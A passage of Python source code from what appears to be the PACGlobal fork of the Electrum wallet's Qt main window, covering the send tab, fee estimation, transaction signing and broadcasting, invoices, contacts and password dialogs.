your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a PACGlobal address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = MyLineEdit() grid.addWidget(self.message_e, 2, 1, 1, -1) self.from_label = QLabel(_('From')) grid.addWidget(self.from_label, 3, 0) self.from_list = FromList(self, self.from_list_menu) grid.addWidget(self.from_list, 3, 1, 1, -1) self.set_pay_from([]) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 4, 0) grid.addWidget(self.amount_e, 4, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 4, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(self.amount_e.width()) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 4, 3) hbox = QHBoxLayout() hbox.addStretch(1) grid.addLayout(hbox, 4, 4) msg = _('PACGlobal transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\ + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\ + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.') self.fee_e_label = HelpLabel(_('Fee'), msg) self.extra_payload = ExtraPayloadWidget(self) self.extra_payload.hide() msg = _('Extra payload.') + '\n\n'\ + _('PACGlobal DIP2 Special Transations extra payload.') self.extra_payload_label = HelpLabel(_('Extra payload'), msg) self.extra_payload_label.hide() grid.addWidget(self.extra_payload_label, 7, 0) grid.addWidget(self.extra_payload, 7, 1, 1, -1) def fee_cb(dyn, pos, fee_rate): if dyn: if self.config.use_mempool_fees(): self.config.set_key('depth_level', pos, False) else: self.config.set_key('fee_level', pos, False) else: self.config.set_key('fee_per_kb', fee_rate, False) if fee_rate: fee_rate = Decimal(fee_rate) self.feerate_e.setAmount(quantize_feerate(fee_rate)) else: self.feerate_e.setAmount(None) self.fee_e.setModified(False) self.fee_slider.activate() self.spend_max() if self.max_button.isChecked() else self.update_fee() self.fee_slider = FeeSlider(self, self.config, fee_cb) self.fee_slider.setFixedWidth(self.amount_e.width()) def on_fee_or_feerate(edit_changed, editing_finished): edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e if editing_finished: if edit_changed.get_amount() is None: # This is so that when the user blanks the fee and moves on, # we go back to auto-calculate mode and put a fee back. edit_changed.setModified(False) else: # edit_changed was edited just now, so make sure we will # freeze the correct fee setting (this) edit_other.setModified(False) self.fee_slider.deactivate() self.update_fee() class TxSizeLabel(QLabel): def setAmount(self, byte_size): self.setText(('x %s bytes =' % byte_size) if byte_size else '') self.size_e = TxSizeLabel() self.size_e.setAlignment(Qt.AlignCenter) self.size_e.setAmount(0) self.size_e.setFixedWidth(self.amount_e.width()) self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) self.feerate_e = FeerateEdit(lambda: 0) self.feerate_e.setAmount(self.config.fee_per_kb()) self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False)) self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True)) self.fee_e = BTCAmountEdit(self.get_decimal_point) self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False)) self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True)) def feerounding_onclick(): text = (self.feerounding_text + '\n\n' + _('To somewhat protect your privacy, PacGlobal Electrum tries to create change with similar precision to other outputs.') + ' ' + _('At most 100 duffs might be lost due to this rounding.') + ' ' + _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' + _('Also, dust is not kept as change, but added to the fee.')) self.show_message(title=_('Fee rounding'), msg=text) self.feerounding_icon = QPushButton(read_QIcon('info.png'), '') self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit())) self.feerounding_icon.setFlat(True) self.feerounding_icon.clicked.connect(feerounding_onclick) self.feerounding_icon.setVisible(False) self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e) vbox_feelabel = QVBoxLayout() vbox_feelabel.addWidget(self.fee_e_label) vbox_feelabel.addStretch(1) grid.addLayout(vbox_feelabel, 5, 0) self.fee_adv_controls = QWidget() hbox = QHBoxLayout(self.fee_adv_controls) hbox.setContentsMargins(0, 0, 0, 0) hbox.addWidget(self.feerate_e) hbox.addWidget(self.size_e) hbox.addWidget(self.fee_e) hbox.addWidget(self.feerounding_icon, Qt.AlignLeft) hbox.addStretch(1) vbox_feecontrol = QVBoxLayout() vbox_feecontrol.addWidget(self.fee_adv_controls) vbox_feecontrol.addWidget(self.fee_slider) grid.addLayout(vbox_feecontrol, 5, 1, 1, -1) if not self.config.get('show_fee', False): self.fee_adv_controls.setVisible(False) self.preview_button = EnterButton(_("Preview"), self.do_preview) self.preview_button.setToolTip(_('Display the details of your transaction before signing it.')) self.send_button = EnterButton(_("Send"), self.do_send) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.preview_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 3) self.amount_e.shortcut.connect(self.spend_max) self.payto_e.textChanged.connect(self.update_fee) self.amount_e.textEdited.connect(self.update_fee) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) def entry_changed(): text = "" amt_color = ColorScheme.DEFAULT fee_color = ColorScheme.DEFAULT feerate_color = ColorScheme.DEFAULT if self.not_enough_funds: amt_color, fee_color = ColorScheme.RED, ColorScheme.RED feerate_color = ColorScheme.RED text = _("Not enough funds") c, u, x = self.wallet.get_frozen_balance() if c+u+x: text += " ({} {} {})".format( self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen") ) # blue color denotes auto-filled values elif self.fee_e.isModified(): feerate_color = ColorScheme.BLUE elif self.feerate_e.isModified(): fee_color = ColorScheme.BLUE elif self.amount_e.isModified(): fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE else: amt_color = ColorScheme.BLUE fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE self.statusBar().showMessage(text) self.amount_e.setStyleSheet(amt_color.as_stylesheet()) self.fee_e.setStyleSheet(fee_color.as_stylesheet()) self.feerate_e.setStyleSheet(feerate_color.as_stylesheet()) self.amount_e.textChanged.connect(entry_changed) self.fee_e.textChanged.connect(entry_changed) self.feerate_e.textChanged.connect(entry_changed) self.invoices_label = QLabel(_('Invoices')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) w = QWidget() w.setObjectName("send_container") vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return self.max_button.setChecked(True) self.do_update_fee() def update_fee(self): self.require_fee_update = True def get_payto_or_dummy(self): r = self.payto_e.get_recipient() if r: return r return (TYPE_ADDRESS, self.wallet.dummy_address()) def do_update_fee(self): '''Recalculate the fee. If the fee was manually input, retain it, but still build the TX to see if there are enough funds. ''' freeze_fee = self.is_send_fee_frozen() freeze_feerate = self.is_send_feerate_frozen() amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount() if amount is None: if not freeze_fee: self.fee_e.setAmount(None) self.not_enough_funds = False self.statusBar().showMessage('') return (outputs, fee_estimator, tx_desc, coins, tx_type, extra_payload) = self.read_send_tab() if not outputs: _type, addr = self.get_payto_or_dummy() outputs = [TxOutput(_type, addr, amount)] is_sweep = bool(self.tx_external_keypairs) make_tx = lambda fee_est: \ self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_est, is_sweep=is_sweep, tx_type=tx_type, extra_payload=extra_payload) try: tx = make_tx(fee_estimator) self.not_enough_funds = False except (NotEnoughFunds, NoDynamicFeeEstimates) as e: if not freeze_fee: self.fee_e.setAmount(None) if not freeze_feerate: self.feerate_e.setAmount(None) self.feerounding_icon.setVisible(False) if isinstance(e, NotEnoughFunds): self.not_enough_funds = True elif isinstance(e, NoDynamicFeeEstimates): try: tx = make_tx(0) size = tx.estimated_size() self.size_e.setAmount(size) except BaseException: pass return except BaseException: self.logger.exception('') return size = tx.estimated_size() self.size_e.setAmount(size) fee = tx.get_fee() fee = None if self.not_enough_funds else fee # Displayed fee/fee_rate values are set according to user input. # Due to rounding or dropping dust in CoinChooser, # actual fees often differ somewhat. if freeze_feerate or self.fee_slider.is_active(): displayed_feerate = self.feerate_e.get_amount() if displayed_feerate is not None: displayed_feerate = quantize_feerate(displayed_feerate) else: # fallback to actual fee displayed_feerate = quantize_feerate(fee * 1000 / size) if fee is not None else None self.feerate_e.setAmount(displayed_feerate) displayed_fee = round(displayed_feerate * size / 1000) if displayed_feerate is not None else None self.fee_e.setAmount(displayed_fee) else: if freeze_fee: displayed_fee = self.fee_e.get_amount() else: # fallback to actual fee if nothing is frozen displayed_fee = fee self.fee_e.setAmount(displayed_fee) displayed_fee = displayed_fee if displayed_fee else 0 displayed_feerate = quantize_feerate(displayed_fee * 1000 / size) if displayed_fee is not None else None self.feerate_e.setAmount(displayed_feerate) # show/hide fee rounding icon feerounding = (fee - displayed_fee) if fee else 0 self.set_feerounding_text(int(feerounding)) self.feerounding_icon.setToolTip(self.feerounding_text) self.feerounding_icon.setVisible(abs(feerounding) >= 1) if self.max_button.isChecked(): amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) def from_list_delete(self, item): i = self.from_list.indexOfTopLevelItem(item) self.pay_from.pop(i) self.redraw_from_list() self.update_fee() def from_list_menu(self, position): item = self.from_list.itemAt(position) menu = QMenu() menu.addAction(_("Remove"), lambda: self.from_list_delete(item)) menu.exec_(self.from_list.viewport().mapToGlobal(position)) def set_pay_from(self, coins): self.pay_from = list(coins) self.redraw_from_list() def redraw_from_list(self): self.from_list.clear() self.from_label.setHidden(len(self.pay_from) == 0) self.from_list.setHidden(len(self.pay_from) == 0) def format(x): h = x.get('prevout_hash') return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address') for item in self.pay_from: self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password def is_send_fee_frozen(self): return self.fee_e.isVisible() and self.fee_e.isModified() \ and (self.fee_e.text() or self.fee_e.hasFocus()) def is_send_feerate_frozen(self): return self.feerate_e.isVisible() and self.feerate_e.isModified() \ and (self.feerate_e.text() or self.feerate_e.hasFocus()) def get_send_fee_estimator(self): if self.is_send_fee_frozen(): fee_estimator = self.fee_e.get_amount() elif self.is_send_feerate_frozen(): amount = self.feerate_e.get_amount() # sat/kB feerate amount = 0 if amount is None else amount # sat/kB feerate fee_estimator = partial( simple_config.SimpleConfig.estimate_fee_for_feerate, amount) else: fee_estimator = None return fee_estimator def read_send_tab(self): label = self.message_e.text() if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) fee_estimator = self.get_send_fee_estimator() coins = self.get_coins() tx_type, extra_payload = self.extra_payload.get_extra_data() return outputs, fee_estimator, label, coins, tx_type, extra_payload def check_send_tab_outputs_and_show_errors(self, outputs) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.address is None: self.show_error(_('PACGlobal Address is None')) return True if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address): self.show_error(_('Invalid PACGlobal Address')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def do_preview(self): self.do_send(preview = True) def do_send(self, preview = False): if run_hook('abort_send', self): return (outputs, fee_estimator, tx_desc, coins, tx_type, extra_payload) = self.read_send_tab() if self.check_send_tab_outputs_and_show_errors(outputs): return try: is_sweep = bool(self.tx_external_keypairs) tx = self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_estimator, is_sweep=is_sweep, tx_type=tx_type, extra_payload=extra_payload) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: self.show_message(str(e)) return except InternalAddressCorruption as e: self.show_error(str(e)) raise except BaseException as e: self.logger.exception('') self.show_message(str(e)) return if tx.tx_type: try: tx.extra_payload.check_after_tx_prepared(tx) except DashTxError as e: self.show_message(str(e)) return amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs)) fee = tx.get_fee() if fee < self.wallet.relayfee() * tx.estimated_size() / 1000: self.show_error('\n'.join([ _("This transaction requires a higher fee, or it will not be propagated by your current server"), _("Try to raise your transaction fee, or use a server with a lower relay fee.") ])) return if preview: self.show_transaction(tx, tx_desc) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) return # confirmation dialog msg = [ _("Amount to be sent") + ": " + self.format_amount_and_units(amount), _("Mining fee") + ": " + self.format_amount_and_units(fee), ] x_fee = run_hook('get_tx_extra_fee', self.wallet, tx) if x_fee: x_fee_address, x_fee_amount = x_fee msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) ) feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE if fee > feerate_warning * tx.estimated_size() / 1000: msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high.")) if self.wallet.has_keystore_encryption(): msg.append("") msg.append(_("Enter your password to proceed")) password = self.password_dialog('\n'.join(msg)) if not password: return else: msg.append(_('Proceed?')) password = None if not self.question('\n'.join(msg)): return def sign_done(success): if success: if not tx.is_complete(): self.show_transaction(tx) self.do_clear() else: self.broadcast_transaction(tx, tx_desc) self.sign_tx_with_password(tx, sign_done, password) @protected def sign_tx(self, tx, callback, password): self.sign_tx_with_password(tx, callback, password) def sign_tx_with_password(self, tx, callback, password): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if self.tx_external_keypairs: # can sign directly task = partial(Transaction.sign, tx, self.tx_external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx, tx_desc): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Payment request has expired") status = False try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: msg = e.get_message_for_gui() except BestEffortRequestFailed as e: msg = repr(e) else: status, msg = True, tx.txid() if pr and status is True: self.invoices.set_paid(pr, tx.txid()) self.invoices.save() self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}") return status, msg # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: status, msg = result if status: if tx_desc is not None and tx.is_complete(): self.wallet.set_label(tx.txid(), tx_desc) parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() self.do_clear() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b): self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoice(self, key): self.invoices.remove(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = self.invoices.add(pr) status = self.invoices.get_status(key) self.invoice_list.update() if status == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point)) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(pr.error) self.payment_request = None self.do_clear() def on_pr(self, request): self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.not_enough_funds = False self.payment_request = None self.payto_e.is_pr = False for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.feerate_e]: e.setText('') e.setFrozen(False) self.fee_slider.activate() self.feerate_e.setAmount(self.config.fee_per_kb()) self.size_e.setAmount(0) self.feerounding_icon.setVisible(False) self.set_pay_from([]) self.tx_external_keypairs = {} self.extra_payload.clear() self.hide_extra_payload() self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() self.update_fee() def set_frozen_state_of_coins(self, utxos, freeze: bool): self.wallet.set_frozen_state_of_coins(utxos, freeze) self.utxo_list.update() self.update_fee() def create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) vbox.setContentsMargins(0, 0, 0, 0) vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) l.setObjectName("addresses_container") toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_addresses', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = l = UTXOList(self) l.setObjectName("utxo_container") return self.create_list_tab(l) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) l.setObjectName("contacts_container") return self.create_list_tab(l) def create_proposals_tab(self): from .masternode_budget_widgets import ProposalsTab self.proposals_list = ProposalsTab(self) return self.proposals_list def update_proposals_tab(self): # Disabled until API is stable. return if not self.masternode_manager: return self.proposals_list.update(list(self.network.all_proposals)) def remove_address(self, addr): if self.question(_("Do you want to remove {} from your wallet?").format(addr)): self.wallet.delete_address(addr) self.need_update.set() # history, addresses, coins self.clear_receive_tab() def get_coins(self): if self.pay_from: return self.pay_from else: return self.wallet.get_spendable_coins(None, self.config) def hide_extra_payload(self): self.extra_payload.hide() self.extra_payload_label.hide() def show_extra_payload(self): self.extra_payload.show() self.extra_payload_label.show() def spend_coins(self, coins): self.set_pay_from(coins) self.show_send_tab() self.update_fee() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_invoice(self, key): pr = self.invoices.get(key) if pr is None: self.show_error('Cannot find payment request in wallet.') return pr.verify(self.contacts) self.show_pr_details(pr) def show_pr_details(self, pr): key = pr.get_id() d = WindowModalDialog(self, _("Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0) grid.addWidget(QLabel(pr.get_requestor()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs())) grid.addWidget(QLabel(outputs_str), 1, 1) expires = pr.get_expiration_date() grid.addWidget(QLabel(_("Memo") + ':'), 2, 0) grid.addWidget(QLabel(pr.get_memo()), 2, 1) grid.addWidget(QLabel(_("Signature") + ':'), 3, 0) grid.addWidget(QLabel(pr.get_verify_status()), 3, 1) if expires: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(expires)), 4, 1) vbox.addLayout(grid) def do_export(): name = str(key) + '.bip70' fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70") if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('Invoice saved as' + ' ' + fn)) exportButton = EnterButton(_('Save'), do_export) def do_delete(): if self.question(_('Delete invoice?')): self.invoices.remove(key) self.history_list.update() self.invoice_list.update() d.close() deleteButton = EnterButton(_('Delete'), do_delete) vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d))) d.exec_() def do_pay_invoice(self, key): pr = self.invoices.get(key) self.payment_request = pr self.prepare_for_payment_request() pr.error = None # this forces verify() to re-run if pr.verify(self.contacts): self.payment_request_ok() else: self.payment_request_error() def create_console_tab(self): from .console import Console self.console = console = Console() console.setObjectName("console_container") return console def update_console(self): console = self.console console.history = self.config.get("console-history",[]) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 'network': self.network, 'plugins': self.gui_object.plugins, 'window': self, 'config': self.config, 'electrum': electrum_dash, 'daemon': self.gui_object.daemon, 'util': util, 'bitcoin': bitcoin, }) c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args: f(method, args, self.password_dialog) for m in dir(c): if m[0]=='_' or m in ['network','wallet','config']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) self.balance_label = QLabel("Loading wallet...") self.balance_label.setObjectName("main_window_balance") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.update_check_button = QPushButton("") self.update_check_button.setFlat(True) self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor)) self.update_check_button.setIcon(read_QIcon("update.png")) self.update_check_button.hide() sb.addPermanentWidget(self.update_check_button) self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog ) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) ) self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self)) sb.addPermanentWidget(self.status_button) self.dash_net_button = StatusBarButton(read_QIcon('dash_net_0.png'), _("PACGlobal Network"), lambda: self.gui_object.show_dash_net_dialog(self)) self.update_dash_net_status_btn() sb.addPermanentWidget(self.dash_net_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) self.send_button.setVisible(not self.wallet.is_watching_only()) def change_password_dialog(self): from electrum_dash.storage import STO_EV_XPUB_PW if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(str(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): tab = self.tabs.currentWidget() #if hasattr(tab, 'searchable_list'): # tab.searchable_list.toggle_toolbar() #return self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(32 * char_width_in_lineedit()) line2 = QLineEdit() line2.setFixedWidth(32 * char_width_in_lineedit()) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_master_public_keys(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) mpk_list = self.wallet.get_master_public_keys() vbox = QVBoxLayout() wallet_type = self.wallet.storage.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) 